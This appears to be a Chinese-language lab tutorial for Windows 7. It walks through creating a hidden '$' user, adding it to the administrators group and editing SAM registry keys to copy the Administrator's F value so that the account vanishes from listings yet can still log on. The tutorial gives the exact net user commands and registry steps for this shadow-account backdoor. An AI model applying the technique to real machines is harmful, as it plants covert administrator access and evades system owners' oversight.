温馨提示:最好在虚拟机做这个小实验,不然就记住自己系统的用户名和密码
实验环境
windows 7 操作系统
实验步骤
查看本地有哪些用户:net user
添加隐藏用户test:net user test$ 123456 /add,$表示隐藏
提升到管理员用户组:net localgroup administrators test$ /add
再次使用net user命令查看本地用户
这里没有显示我们刚刚创建的隐藏用户test
我们去系统的用户账户查看一下
发现test用户已经在里面了,接下来实现隐藏这个用户的操作
win+r输入regedit进入注册表,找到SAM文件夹
此时这个文件夹是空的,我们需要先提权(提升权限):右键这个文件夹,点击权限
如上图所示勾选并确定
此时的SAM文件夹就有数据了,如图所示找到Users
分别查看test$和administrator的类型找到对应文件并导出
test用户对应的类型是0x3ea,我们就找到上面同名的文件夹右键导出,administrator同理导出。最后把test$文件夹右键导出,得到3个注册表文件
admin对应的是0x1f4文件夹的导出,test对应的是0x3ea文件夹的导出,test$对应test$文件夹的导出。右键admin.reg,点击编辑,把admin.reg的F数据复制到test.reg里面,然后再分别运行test$.reg和test.reg文件
接着我们用命令行去删除这个test$隐藏用户:net user test$ /del
分别在命令行、本地账户、注册表中查看是否还存在这个test$隐藏用户,如果命令行和本地账户都不存在但注册表还有test$相关文件夹就说明本次实验成功一大半了
先在命令行激活这个隐藏用户:net user test$ /active:yes
查看一下交互式登录是否显示用户名 win+r键输入gpedit.msc
如图所示目录找到安全选项的交互式登录,如果是已禁用的就修改其状态为已启用
最后注销,验证是否能用test$隐藏用户登录
登录成功,实验到此结束